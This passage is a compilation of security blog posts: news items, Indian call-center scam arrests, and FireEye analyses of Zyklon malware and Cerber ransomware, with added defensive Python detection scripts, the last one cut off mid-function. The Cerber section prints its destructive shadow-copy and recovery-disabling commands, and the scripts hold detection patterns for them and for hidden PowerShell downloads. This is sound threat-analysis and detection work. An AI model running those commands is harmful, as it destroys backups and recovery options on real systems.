
    It wouldn't be normal for Facebook not to be in the headlines for poor privacy; this time Facebook announced a Photo API bug which exposed 6.8 million user images.

    Away from the political circus that is Brexit, the European Parliament put into law a new Cybersecurity Act. Because Brexit is making all the headlines, this new law may have gone under the radar, but it is certainly worth keeping an eye on, even after the UK leaves the EU. The EU Parliament has agreed to increase the budget for the ENISA (Network & InfoSec) agency, which will be rebranded as the "EU Agency for Cybersecurity". The Cybersecurity Act will establish an EU-wide framework for cyber-security certifications for online services and customer devices to be used within the European Economic Area, and will include IoT devices and critical infrastructure technology. Knowing the EU's love of regulations, I suspect this new best practice framework and its associated accreditations will be turned into regulations further down the line, which would impact any tech business operating in the European Union.

    The UK Parliament enacted the "Health and Social Care (National Data Guardian) Act", which also went under the radar due to all the Brexit political noise. The act requires the appointment of a data guardian within England and Wales. The data guardian will publish guidance on the processing of health and adult social care data for use by public bodies providing health or social care services, and produce an annual report.

    Chinese telecoms giant Huawei had plenty of negative media coverage throughout December, with the UK government pressuring BT into not using Huawei kit within BT's new 5G network, due to a perceived threat to the UK's future critical national infrastructure posed by the Chinese state-backed tech giant.  The UK Defence Secretary Gavin Williamson said he had "very deep concerns" about Huawei being involved in the new UK mobile network.

    Security company Insinia caused controversy after it took over the Twitter accounts of Eamon Holmes, Louis Theroux and several other celebrities. Insinia said it had managed the account takeover by analysing the way Twitter handles messages posted by phone and the way the social network interacts with smartphones when messages are sent, which allowed it to inject messages onto the targeted accounts. However, Insinia were accused in some quarters of being unethical and breaking the UK Computer Misuse Act.

    Unsecured internet-connected printers are being hacked again; this time they were used to print out messages of support for Swedish YouTube star PewDiePie. A hacker named TheHackerGiraffe was said to have targeted up to 50,000 printers after using Shodan to search for open printer ports online; the scan was said to have found 800,000 vulnerable printers.

    A Financial Conduct Authority (FCA) report warned UK banks about their over-reliance on third-party security providers. The FCA said companies "generally lacked board members with strong familiarity or specific technical cyber-expertise. External expertise may be helpful but may also, if overly relied on, undermine the effectiveness of the ‘three lines of defence’ model in identifying and managing cyber-risks in a timely way." The report also warned about supply-chain security, especially the role that firms play in other organisations’ supply chains.


    126 Arrests: The Emergence of India’s Cyber Crime Detectives Fighting Call Center Scams

    The Times of India reports that police have raided a call center in Noida Sector 63 where hundreds of fraud calls were placed every day to Americans and Canadians resulting in the theft of $50,000 per day.

    The scammers had rented four floors of a building being operated by two scammers from Gurgaon, Narendra Pahuja and Jimmy Ashija. Their boss, who was not named by the police, allegedly operates at least five call centers. In the raid this week, 126 employees were arrested and police seized 312 workstations, as well as Rs 20 lakh in cash (about $28,500 USD).

    Times of India photo 


    Noida police have been cooperating very well with international authorities, as well as Microsoft, leading to more than 200 people arrested in Noida and "scores" of fake call centers shut down, including four in Sector 63.  (In a case just last month, another call center was said to have stolen from 300 victims, after using online job sites Shine.com and VintechJobs.com to recruit young money seekers and put them to work conducting the scams.)

    In the current scam, callers already had possession of the victim's Social Security Number and full name.  This information was used to add authority to their request, which got really shady really fast.  The victim was instructed to purchase Apple iTunes Gift Cards, or Google Play Gift Cards, scratch the numbers, and read them to the call center employee.  The money was laundered through a variety of businesses in China and India before cashing out to bank accounts belonging to Pahuja and Ashija.

    Noida police are advancing in their Cyber Crime skills!

    As more and more cyber crime enterprises spring up in India, the assistance of their new Centers for Cyber Crime Investigation is becoming more critical to stopping fraud against Americans:

    We applaud the Center for Cyber Crime Investigation in Noida


    The US Embassy was quick to acknowledge the support of the newest cyber crime partners of the United States after their action at the end of November:

    US Embassy to India thanks the Noida and Gurgaon Police for their help!

    Another recent Times of India story from November 30, 2018, "Bogus Call Centres and Pop-up Virus Alerts - a Global Cyber Con Spun up in NCR" [NCR = National Capital Region], had more details of this trend, including this graphic:


    That's at least 50 call centers shut down just in these two regions, and this week's 126 arrests are the culmination of an ongoing investigation that received data from both the FBI and Microsoft.

    Local news of India reported the names of some of the gang members held in the November 29-30th action in their story नोएडा: बड़ी कंपनियों में नौकरी दिलाने के नाम पर करते थे धोखाधड़ी, 8 गिरफ्तार (Noida: Fraud, 8 arrested for giving fake jobs in the name of big companies).

    Sontosh Gupta, who was the ring leader, was previously employed by an online job site, but then created his own site,  vintechjobs (dot) com, which he used to attract call center employees, many of whom were duped into serving as his scammer army without ever being compensated for their work!

    Others arrested then included Mohan Kumar, Paritosh Kumar, Jitendra Kumar, Victor, Himanshu, Ashish Jawla, and Jaswinder.

    During that same two-day raid, police swept through at least sixteen other call centers, according to this New York Times story, "That Virus Alert on Your Computer? Scammers in India May Be Behind It".

    Ajay Pal Sharma, the senior superintendent of police, told the NYT that 50 of his officers swept through eight different call centers in Gautam Budh Nagar as part of the case.  Microsoft's Digital Crimes Unit told the Times that with 1.2 million people generating $28 Billion in India working for call centers, it isn't hard to disguise the shady callers among the legitimate businesses.

    The problem is not unique to Delhi and the National Capital Region suburbs that are the current focus.  Back in July, Mumbai was in the headlines, as a massive IRS-imitating Call Center ring was broken up with the help of more great cyber crime investigators from India:

    Madan Ballal, Thane Crime Branch, outside Mumbai
    Police Inspector Madan Ballal had his story told as the focus of an article in Narratively, "This Indian Cop Took Down a Massive IRS Call-Center Scam".

    Much more investigating and arresting needs to be done, but it is a great sign that the problem is now receiving help from an emerging new generation of Indian Cybercrime Detectives!



    It's the most wonderful time of the year – Patching

    does that say patching plaster or patch faster? 😉

    Remember back when the summer and Christmas breaks were a high time of concern.  The kids were out of college and ready to try out their skills.  Christmas was worse because so many people were out of the office; no one would notice, or if they did, the response would be limited.   Now that's what we call a Tuesday afternoon.  Nowadays, sysadmins have to deal not just with college code projects, but with insider threats, money-motivated attackers, and nation states.

    This week, Microsoft’s “out-of-band” security update reminded me of the old times.    An out-of-band update is simply an unscheduled one.  It's released outside the regular schedule because the vulnerability is currently being exploited, which lends a sense of urgency.    Some companies may have already bypassed December updates because of staffing or scheduling.  Anyone in retail certainly has a change freeze in effect.  Now on top of that there is a special update for Internet Explorer.

    Information about the update for Internet Explorer is available here : https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8653 

    The post It's the most wonderful time of the year – Patching appeared first on Roger's Information Security Blog.

    Microsoft Office Vulnerabilities Used to Distribute Zyklon Malware in Recent Campaign

    Introduction

    FireEye researchers recently observed threat actors leveraging relatively new vulnerabilities in Microsoft Office to spread Zyklon HTTP malware. Zyklon has been observed in the wild since early 2016 and provides myriad sophisticated capabilities.

    Zyklon is a publicly available, full-featured backdoor capable of keylogging, password harvesting, downloading and executing additional plugins, conducting distributed denial-of-service (DDoS) attacks, and self-updating and self-removal. The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so. The malware can download several plugins, some of which include features such as cryptocurrency mining and password recovery, from browsers and email software. Zyklon also provides a very efficient mechanism to monitor the spread and impact.

    Infection Vector

    We have observed this recent wave of Zyklon malware being delivered primarily through spam emails. The email typically arrives with an attached ZIP file containing a malicious DOC file (Figure 1 shows a sample lure).

    The following industries have been the primary targets in this campaign:

    • Telecommunications
    • Insurance
    • Financial Services


    Figure 1: Sample lure documents

    Attack Flow

    1. Spam email arrives in the victim’s mailbox as a ZIP attachment, which contains a malicious DOC file.
    2. The document files exploit at least three known vulnerabilities in Microsoft Office, which we discuss in the Infection Techniques section. Upon execution in a vulnerable environment, the PowerShell based payload takes over.
    3. The PowerShell script is responsible for downloading the final payload from the C2 server and executing it.

    A visual representation of the attack flow and execution chain can be seen in Figure 2.


    Figure 2: Zyklon attack flow

    Infection Techniques

    CVE-2017-8759

    This vulnerability was discovered by FireEye in September 2017, and it is a vulnerability we have observed being exploited in the wild.

    The DOC file contains an embedded OLE Object that, upon execution, triggers the download of an additional DOC file from the stored URL (seen in Figure 3).


    Figure 3: Embedded URL in OLE object

    CVE-2017-11882

    Similarly, we have also observed actors leveraging another recently discovered vulnerability (CVE-2017-11882) in Microsoft Office. Upon opening the malicious DOC attachment, an additional download is triggered from a stored URL within an embedded OLE Object (seen in Figure 4).


    Figure 4: Embedded URL in OLE object


    Figure 5: HTTP GET request to download the next level payload

    The downloaded file, doc.doc, is XML-based and contains a PowerShell command (shown in Figure 6) that subsequently downloads Pause.ps1.


    Figure 6: PowerShell command to download the Pause.ps1 payload

    Dynamic Data Exchange (DDE)

    Dynamic Data Exchange (DDE) is the interprocess communication mechanism that is exploited to perform remote code execution. With the help of a PowerShell script (shown in Figure 7), the next payload (Pause.ps1) is downloaded.


    Figure 7: DDE technique used to download the Pause.ps1 payload

    One of the unique approaches we have observed is the use of dot-less IP addresses (example: hxxp://258476380).
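    Dot-less hosts like the one quoted above defeat plain string matching against a dotted-quad indicator list, so a normaliser is the first thing a log pipeline needs. The following is an added Python example, not FireEye's code or tooling: it refangs hxxp URLs, rewrites single-number hosts to dotted quad (the hex form goes beyond what the post describes), and matches the result against a constructed indicator set; 15.104.9.92 is simply the dotted form of the post's example number and is not a real Zyklon address.

```python
import re
from typing import List, Optional, Set, Tuple
from urllib.parse import urlsplit

# The post quotes a "dot-less" URL of the form hxxp://258476380: the whole IPv4
# address is written as one 32-bit decimal integer, which plain string matching
# against a dotted-quad indicator list will never catch.
_DECIMAL_HOST = re.compile(r"^\d+$")
_HEX_HOST = re.compile(r"^0x[0-9a-f]+$", re.IGNORECASE)


def refang(url: str) -> str:
    """Undo the hxxp/hxxps defanging used when quoting URLs in reports."""
    return re.sub(r"^hxxp(s?)://", r"http\1://", url, flags=re.IGNORECASE)


def int_to_quad(value: int) -> Optional[str]:
    """Render a 32-bit integer as dotted quad; None if it does not fit in 32 bits."""
    if value < 0 or value > 0xFFFFFFFF:
        return None
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def normalize_host(url: str) -> str:
    """Return the URL's host, rewriting decimal or hex single-number hosts to dotted quad."""
    host = urlsplit(refang(url)).hostname or ""
    if _DECIMAL_HOST.match(host):
        quad = int_to_quad(int(host, 10))
    elif _HEX_HOST.match(host):
        quad = int_to_quad(int(host, 16))
    else:
        quad = None
    return quad if quad is not None else host


def match_indicators(urls: List[str], indicators: Set[str]) -> List[Tuple[str, str]]:
    """Pair each URL with its normalized host when that host is on the indicator list."""
    hits = []
    for url in urls:
        host = normalize_host(url)
        if host in indicators:
            hits.append((url, host))
    return hits


# Constructed sample: the dotted form of the post's example number, 15.104.9.92,
# is used purely as a demo indicator and is not a real Zyklon address.
SAMPLE_INDICATORS = {"15.104.9.92"}
SAMPLE_URLS = [
    "hxxp://258476380/Pause.ps1",          # dot-less decimal, as quoted in the post
    "http://0x0F68095C/Pause.ps1",         # same address in hex (constructed)
    "http://15.104.9.92/words.exe",        # already dotted (constructed)
    "http://example.test/index.html",      # unrelated host (constructed)
]

if __name__ == "__main__":
    for url, host in match_indicators(SAMPLE_URLS, SAMPLE_INDICATORS):
        print(f"{url} -> {host}")
```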

    Figure 8 shows the network communication of the Pause.ps1 download.


    Figure 8: Network communication to download the Pause.ps1 payload

    Zyklon Delivery

    In all these techniques, the same domain is used to download the next level payload (Pause.ps1), which is another PowerShell script that is Base64 encoded (as seen in Figure 8).

    The Pause.ps1 script is responsible for resolving the APIs required for code injection. It also contains the injectable shellcode. The APIs include VirtualAlloc(), memset(), and CreateThread(). Figure 9 shows the decoded Base64 code.


    Figure 9: Base64 decoded Pause.ps1

    The injected code is responsible for downloading the final payload from the server (see Figure 10). The final stage payload is a PE executable compiled with the .NET Framework.


    Figure 10: Network traffic to download final payload (words.exe)

    Once executed, the file performs the following activities:

    1. Drops a copy of itself in %AppData%\svchost.exe\svchost.exe and drops an XML file, which contains configuration information for Task Scheduler (as shown in Figure 11).
    2. Unpacks the code in memory via process hollowing. The MSIL file contains the packed core payload in its .Net resource section.
    3. The unpacked code is Zyklon.


    Figure 11: XML configuration file to schedule the task

    The Zyklon malware first retrieves the external IP address of the infected machine using the following:

    • api.ipify[.]org
    • ip.anysrc[.]net
    • myexternalip[.]com
    • whatsmyip[.]com

    The Zyklon executable contains another encrypted file in its .Net resource section named tor. This file is decrypted and injected into an instance of InstallUtil.exe, and functions as a Tor anonymizer.

    Command & Control Communication

    The C2 communication of Zyklon is proxied through the Tor network. The malware sends a POST request to the C2 server, whose URL has gate.php appended; that string is stored in the file’s memory. The parameter passed in this request is getkey=y. In response, the C2 server returns a Base64-encoded RSA public key (seen in Figure 12).


    Figure 12: Zyklon public RSA key

    After the connection is established with the C2 server, the malware can communicate with its control server using the commands shown in Table 1.

    Command     Action
    sign        Requests system information
    settings    Requests settings from C2 server
    logs        Uploads harvested passwords
    wallet      Uploads harvested cryptocurrency wallet data
    proxy       Indicates SOCKS proxy port opened
    miner       Cryptocurrency miner commands
    error       Reports errors to C2 server
    ddos        DDoS attack commands

    Table 1: Zyklon accepted commands

    The following figures show the initial request and subsequent server response for the “settings” (Figure 13), “sign” (Figure 14), and “ddos” (Figure 15) commands.


    Figure 13: Zyklon issuing “settings” command and subsequent server response


    Figure 14: Zyklon issuing “sign” command and subsequent server response


    Figure 15: Zyklon issuing “ddos” command and subsequent server response

    Plugin Manager

    Zyklon downloads a number of plugins from its C2 server. The plugin URL is stored in the file in the following format:

    • /plugin/index.php?plugin=<Plugin_Name>

    The following plugins are found in the memory of the Zyklon malware:

    • /plugin/index.php?plugin=cuda
    • /plugin/index.php?plugin=minerd
    • /plugin/index.php?plugin=sgminer
    • /plugin/index.php?plugin=socks
    • /plugin/index.php?plugin=tor
    • /plugin/index.php?plugin=games
    • /plugin/index.php?plugin=software
    • /plugin/index.php?plugin=ftp
    • /plugin/index.php?plugin=email
    • /plugin/index.php?plugin=browser

    The downloaded plugins are injected into: Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe.
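    The host-side behaviour described above (a copy dropped as %AppData%\svchost.exe\svchost.exe with a Task Scheduler XML, the tor module injected into InstallUtil.exe and plugins into RegAsm.exe) gives a defender three concrete things to hunt for. The following is an added Python example, not FireEye's code: it runs those three checks over a constructed event schema and a constructed Task Scheduler XML fragment, which are not real logs from this campaign.

```python
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Directories where a legitimate Windows svchost.exe lives.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Processes the analysis says Zyklon injects into (tor module -> InstallUtil.exe,
# plugins -> RegAsm.exe); outbound connections from them deserve a look.
INJECTION_HOSTS = ("installutil.exe", "regasm.exe")


@dataclass
class Event:
    """Minimal process/network event; a constructed schema, not a real log format."""
    kind: str                   # "process" or "network"
    image: str                  # full path of the process image
    dest: Optional[str] = None  # destination host for network events


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def svchost_outside_system(image: str) -> bool:
    """True when something named svchost.exe runs from outside the system directories."""
    low = image.lower()
    return basename(low) == "svchost.exe" and not low.startswith(SYSTEM_DIRS)


def task_commands_in_appdata(task_xml: str) -> List[str]:
    """Return <Exec><Command> values from Task Scheduler XML that point into %AppData%."""
    root = ET.fromstring(task_xml)
    hits = []
    for elem in root.iter():
        # Tags carry the Task Scheduler namespace, so compare on the local name only.
        if elem.tag.rsplit("}", 1)[-1] == "Command" and elem.text:
            cmd = elem.text.strip()
            low = cmd.lower()
            if low.startswith("%appdata%") or "\\appdata\\" in low:
                hits.append(cmd)
    return hits


def hunt(events: List[Event], task_xmls: List[str]) -> List[Tuple[str, str]]:
    """Apply the three checks and return (rule name, detail) pairs."""
    findings = []
    for e in events:
        if e.kind == "process" and svchost_outside_system(e.image):
            findings.append(("svchost_outside_system", e.image))
        elif e.kind == "network" and basename(e.image) in INJECTION_HOSTS:
            findings.append(("network_from_injection_host", f"{e.image} -> {e.dest}"))
    for xml in task_xmls:
        for cmd in task_commands_in_appdata(xml):
            findings.append(("scheduled_task_in_appdata", cmd))
    return findings


# Constructed sample data mirroring the behaviour described in the analysis.
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\svchost.exe"),                  # benign
    Event("process", r"C:\Users\alice\AppData\Roaming\svchost.exe\svchost.exe"),
    Event("network", r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
          dest="plugin-host.invalid"),                                      # constructed
    Event("network", r"C:\Program Files\Browser\browser.exe", dest="example.test"),
]

# Constructed Task Scheduler fragment; only the Actions section is included.
SAMPLE_TASK_XML = """\
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>%AppData%\\svchost.exe\\svchost.exe</Command>
    </Exec>
  </Actions>
</Task>
"""

if __name__ == "__main__":
    for rule, detail in hunt(SAMPLE_EVENTS, [SAMPLE_TASK_XML]):
        print(f"{rule}: {detail}")
```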

    Additional Features

    The Zyklon malware offers the following additional capabilities (via plugins):

    Browser Password Recovery

    Zyklon HTTP can recover passwords from popular web browsers, including:

    • Google Chrome
    • Mozilla Firefox
    • Internet Explorer
    • Opera Browser
    • Chrome Canary/SXS
    • CoolNovo Browser
    • Apple Safari
    • Flock Browser
    • SeaMonkey Browser
    • SRWare Iron Browser
    • Comodo Dragon Browser

    FTP Password Recovery

    Zyklon currently supports FTP password recovery from the following FTP applications:

    • FileZilla
    • SmartFTP
    • FlashFXP
    • FTPCommander
    • Dreamweaver
    • WS_FTP

    Gaming Software Key Recovery

    Zyklon can recover PC Gaming software keys from the following games:

    • Battlefield
    • Call of Duty
    • FIFA
    • NFS
    • Age of Empires
    • Quake
    • The Sims
    • Half-Life
    • IGI
    • Star Wars

    Email Password Recovery

    Zyklon may also collect email passwords from the following applications:

    • Microsoft Outlook Express
    • Microsoft Outlook 2002/XP/2003/2007/2010/2013
    • Mozilla Thunderbird
    • Windows Live Mail 2012
    • IncrediMail, Foxmail v6.x - v7.x
    • Windows Live Messenger
    • MSN Messenger
    • Google Talk
    • GMail Notifier
    • PaltalkScene IM
    • Pidgin (Formerly Gaim) Messenger
    • Miranda Messenger
    • Windows Credential Manager

    License Key Recovery

    The malware automatically detects and decrypts the license/serial keys of more than 200 popular pieces of software, including Office, SQL Server, Adobe, and Nero.

    Socks5 Proxy

    Zyklon features the ability to establish a reverse Socks5 proxy server on infected host machines.

    Hijack Clipboard Bitcoin Address

    Zyklon has the ability to hijack the clipboard, replacing the user’s copied bitcoin address with an address served up by the actor’s control server.

    Zyklon Pricing

    Researchers identified different versions of Zyklon HTTP being advertised in a popular underground marketplace for the following prices:

    • Normal build: $75 (USD)
    • Tor-enabled build: $125 (USD)
    • Rebuild/Updates: $15 (USD)
    • Payment Method: Bitcoin (BTC)

    Conclusion

    Threat actors incorporating recently discovered vulnerabilities in popular software – Microsoft Office, in this case – only increases the potential for successful infections. These types of threats show why it is very important to ensure that all software is fully updated. Additionally, all industries should be on alert, as it is highly likely that the threat actors will eventually move outside the scope of their current targeting.

    At the time of writing, the FireEye Multi Vector Execution (MVX) engine is able to recognize and block this threat. Table 2 lists the current detection and blocking capabilities by product.

    Detection Name                               Product      Action
    POWERSHELL DOWNLOADER D (METHODOLOGY)        HX           Detect
    SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)    HX           Detect
    POWERSHELL DOWNLOADER (METHODOLOGY)          HX           Detect
    SUSPICIOUS EQNEDT USAGE (METHODOLOGY)        HX           Detect
    TOR (TUNNELER)                               HX           Detect
    SUSPICIOUS SVCHOST.EXE (METHODOLOGY)         HX           Detect
    Malware.Binary.rtf                           EX/ETP/NX    Block
    Malware.Binary                               EX/ETP/NX    Block
    FE_Exploit_RTF_CVE_2017_8759                 EX/ETP/NX    Block
    FE_Exploit_RTF_CVE201711882_1                EX/ETP/NX    Block

    Table 2: Current detection capabilities by FireEye products

    Indicators of Compromise

    The contained analysis is based on the representative sample lures shown in Table 3.

    | MD5 | Name |
    |---|---|
    | 76011037410d031aa41e5d381909f9ce | accounts.doc |
    | 4bae7fb819761a7ac8326baf8d8eb6ab | Courrier.doc |
    | eb5fa454ab42c8aec443ba8b8c97339b | doc.doc |
    | 886a4da306e019aa0ad3a03524b02a1c | Pause.ps1 |
    | 04077ecbdc412d6d87fc21e4b3a4d088 | words.exe |

    Table 3: Sample Zyklon lures

    Network Indicators
    • 154.16.93.182
    • 85.214.136.179
    • 178.254.21.218
    • 159.203.42.107
    • 217.12.223.216
    • 138.201.143.186
    • 216.244.85.211
    • 51.15.78.0
    • 213.251.226.175
    • 93.95.100.202
    • warnono.punkdns.top
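    The indicator list above is only useful once it is run against logs. The following script is an added example (not code from the post or from FireEye) that matches those indicators against outbound-connection records; the IP addresses and host name are the ones listed above, while the log lines, their "timestamp src -> dst:port" layout and the internal addresses are constructed for this example.

```python
"""Match the network indicators from the Zyklon post against outbound
connection logs. Indicator values come from the post; the log lines are
constructed for this example and use a simple "<timestamp> <src> -> <dst>[:<port>]"
format where dst is either an IP address or a hostname, as a proxy or DNS
log would record it."""
import ipaddress
import re

# Indicators exactly as listed in the post's "Network Indicators" section.
INDICATORS = [
    "154.16.93.182", "85.214.136.179", "178.254.21.218", "159.203.42.107",
    "217.12.223.216", "138.201.143.186", "216.244.85.211", "51.15.78.0",
    "213.251.226.175", "93.95.100.202", "warnono.punkdns.top",
]


def _is_ip(value):
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


IP_INDICATORS = {i for i in INDICATORS if _is_ip(i)}
DOMAIN_INDICATORS = {i.lower() for i in INDICATORS if not _is_ip(i)}

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+->\s+([^:\s]+)(?::(\d+))?\s*$")


def match_destination(dst):
    """Return the indicator that dst matches, or None.
    IPs match exactly; hostnames match the indicator itself or any subdomain."""
    if _is_ip(dst):
        return dst if dst in IP_INDICATORS else None
    host = dst.lower().rstrip(".")
    for dom in DOMAIN_INDICATORS:
        if host == dom or host.endswith("." + dom):
            return dom
    return None


def scan_log(lines):
    """Return (timestamp, src, dst, matched_indicator) for every hit, in log order."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of failing the whole scan
        ts, src, dst, _port = m.groups()
        indicator = match_destination(dst)
        if indicator:
            hits.append((ts, src, dst, indicator))
    return hits


# Constructed sample log; these connections are invented for the example.
SAMPLE_LOG = [
    "2018-01-17T10:01:02Z 10.0.0.15 -> 154.16.93.182:443",
    "2018-01-17T10:01:05Z 10.0.0.15 -> example.invalid:443",
    "2018-01-17T10:02:11Z 10.0.0.22 -> warnono.punkdns.top:80",
    "2018-01-17T10:02:12Z 10.0.0.22 -> update.warnono.punkdns.top:80",
    "2018-01-17T10:03:40Z 10.0.0.9 -> 51.15.78.1:80",
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("%s %s -> %s matched indicator %s" % hit)
```

    Note that 51.15.78.0 is listed in the post as a host address, so it is matched exactly rather than treated as a /24; widen it deliberately if your own telemetry suggests the whole range is involved.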

    Uh Oh 365

    In an earlier post, I talked about how some vendors tend to push enterprises into a weaker security posture. In this post, I continue with information relating to Office 365. Microsoft’s cloud implementation of the Office suite is mind boggling in its complexity and sheer want of native connectivity. If you are using a proxy, […]

    Acknowledgement of Attacks Leveraging Microsoft Zero-Day

    FireEye recently detected malicious Microsoft Office RTF documents that leverage a previously undisclosed vulnerability. This vulnerability allows a malicious actor to execute a Visual Basic script when the user opens a document containing an embedded exploit. FireEye has observed several Office documents exploiting the vulnerability that download and execute malware payloads from different well-known malware families.

    FireEye shared the details of the vulnerability with Microsoft and has been coordinating for several weeks public disclosure timed with the release of a patch by Microsoft to address the vulnerability. After recent public disclosure by another company, this blog serves to acknowledge FireEye’s awareness and coverage of these attacks.

    FireEye email and network solutions detect the malicious documents as: Malware.Binary.Rtf.

    Attack Scenario

    The attack involves a threat actor emailing a Microsoft Word document with an embedded OLE2link object to a targeted user. When the user opens the document, winword.exe issues an HTTP request to a remote server to retrieve a malicious .hta file, which appears as a fake RTF file. The Microsoft HTA application loads and executes the malicious script. In both observed documents the malicious script terminated the winword.exe process, downloaded additional payload(s), and loaded a decoy document for the user to see. The original winword.exe process is terminated in order to hide a user prompt generated by the OLE2link.

    The vulnerability is bypassing most mitigations; however, as noted above, FireEye email and network products detect the malicious documents. Microsoft Office users are recommended to apply the patch as soon as it is available. 

    Acknowledgements

    FLARE Team, FireEye Labs Team, FireEye iSIGHT Intelligence, and Microsoft Security Response Center (MSRC).

    Cerber: Analyzing a Ransomware Attack Methodology To Enable Protection

    Ransomware is a common method of cyber extortion for financial gain that typically involves users being unable to interact with their files, applications or systems until a ransom is paid. Accessibility of cryptocurrency such as Bitcoin has directly contributed to this ransomware model. Based on data from FireEye Dynamic Threat Intelligence (DTI), ransomware activities have been rising fairly steadily since mid-2015.

    On June 10, 2016, FireEye’s HX detected a Cerber ransomware campaign involving the distribution of emails with a malicious Microsoft Word document attached. If a recipient were to open the document, a malicious macro would contact an attacker-controlled website to download and install the Cerber family of ransomware.

    Exploit Guard, a major new feature of FireEye Endpoint Security (HX), detected the threat and alerted HX customers on infections in the field so that organizations could inhibit the deployment of Cerber ransomware. After investigating further, the FireEye research team worked with security agency CERT-Netherlands, as well as web hosting providers who unknowingly hosted the Cerber installer, and were able to shut down that instance of the Cerber command and control (C2) within hours of detecting the activity. With the attacker-controlled servers offline, macros and other malicious payloads configured to download are incapable of infecting users with ransomware.

    FireEye hasn’t seen any additional infections from this attacker since shutting down the C2 server, although the attacker could configure one or more additional C2 servers and resume the campaign at any time. This particular campaign was observed on six unique endpoints from three different FireEye endpoint security customers. HX has proven effective at detecting and inhibiting the success of Cerber malware.

    Attack Process

    The Cerber ransomware attack cycle we observed can be broadly broken down into eight steps:

    1. Target receives and opens a Word document.
    2. Macro in document is invoked to run PowerShell in hidden mode.
    3. Control is passed to PowerShell, which connects to a malicious site to download the ransomware.
    4. On successful connection, the ransomware is written to the disk of the victim.
    5. PowerShell executes the ransomware.
    6. The malware configures multiple concurrent persistence mechanisms by creating command processor, screensaver, startup.run and runonce registry entries.
    7. The executable uses native Windows utilities such as WMIC and/or VSSAdmin to delete backups and shadow copies.
    8. Files are encrypted and messages are presented to the user requesting payment.

    Rather than waiting for the payload to be downloaded or started around stage four or five of the aforementioned attack cycle, Exploit Guard provides coverage for most steps of the attack cycle – beginning in this case at the second step.

    The most common way to deliver ransomware is via Word documents with embedded macros or a Microsoft Office exploit. FireEye Exploit Guard detects both of these attacks at the initial stage of the attack cycle.

    PowerShell Abuse

    When the victim opens the attached Word document, the malicious macro writes a small piece of VBScript into memory and executes it. This VBScript executes PowerShell to connect to an attacker-controlled server and download the ransomware (profilest.exe), as seen in Figure 1.

    Figure 1. Launch sequence of Cerber – the macro is responsible for invoking PowerShell and PowerShell downloads and runs the malware

    It has been increasingly common for threat actors to use malicious macros to infect users because the majority of organizations permit macros to run from Internet-sourced office documents.

    In this case we observed the macro code calling PowerShell to bypass execution policies – and run in hidden as well as encrypted mode – with the intention that PowerShell would download the ransomware and execute it without the knowledge of the victim.

    Further investigation of the link and executable showed that every few seconds the malware hash changed with a more current compilation timestamp and different appended data bytes – a technique often used to evade hash-based detection.

    Cerber in Action

    Initial payload behavior

    Upon execution, the Cerber malware checks where it is being launched from. Unless it is running from a specific location (%APPDATA%\<GUID>), it creates a copy of itself in the victim's %APPDATA% folder under a filename chosen pseudo-randomly from the names found in the %WINDIR%\system32 folder.

    When the malware is not yet running from that folder, it first eliminates any blacklisted filenames from an internal list and then writes a renamed copy of itself to “%APPDATA%\<GUID>” using a pseudo-randomly selected name from the “system32” directory. It then executes the copy from the new location and cleans up after itself.

    Shadow deletion

    As with many other ransomware families, Cerber will bypass UAC checks, delete any volume shadow copies and disable safe boot options. Cerber accomplishes this by launching the following processes with the respective arguments:

    Vssadmin.exe "delete shadows /all /quiet"

    WMIC.exe "shadowcopy delete"

    Bcdedit.exe "/set {default} recoveryenabled no"

    Bcdedit.exe "/set {default} bootstatuspolicy ignoreallfailures"
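    The eight-step attack cycle, the macro-to-PowerShell launch sequence and the shadow-deletion commands above (and the winword.exe-to-HTA hand-off described in the earlier zero-day post) are all visible in process-creation telemetry. The following detection logic is an added example written for this page, not code from FireEye or from Exploit Guard; it assumes a simplified, tab-separated process-creation export (timestamp, parent image, image, command line) rather than any product's real schema, and the events, paths, times and the example.invalid host are constructed.

```python
"""Detection logic for the process chains this page describes: winword.exe
handing off to the HTA host, a Word macro starting hidden PowerShell that
downloads a payload, and the vssadmin / WMIC / bcdedit commands Cerber runs to
remove shadow copies and disable recovery. Event lines are constructed for this
example and follow a simplified tab-separated process-creation export
(timestamp, parent image, image, command line), not any product's real format."""
import re
from dataclasses import dataclass

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe", "cmd.exe"}

# (finding name, pattern applied to the lower-cased command line)
COMMANDLINE_RULES = [
    ("shadow_copy_deletion_vssadmin",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows")),
    ("shadow_copy_deletion_wmic",
     re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete")),
    ("recovery_disabled_bcdedit",
     re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+"
                r"(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)")),
    ("hidden_powershell_download",
     re.compile(r"powershell.*(-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|"
                r"downloadfile|downloadstring)")),
]


@dataclass
class ProcessEvent:
    timestamp: str
    parent: str   # parent image basename, lower-cased
    image: str    # image basename, lower-cased
    cmdline: str


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line):
    fields = line.rstrip("\n").split("\t", 3)
    if len(fields) != 4:
        return None
    ts, parent, image, cmdline = fields
    return ProcessEvent(ts, _basename(parent), _basename(image), cmdline)


def evaluate(event):
    """Return the finding names raised by one process-creation event."""
    findings = []
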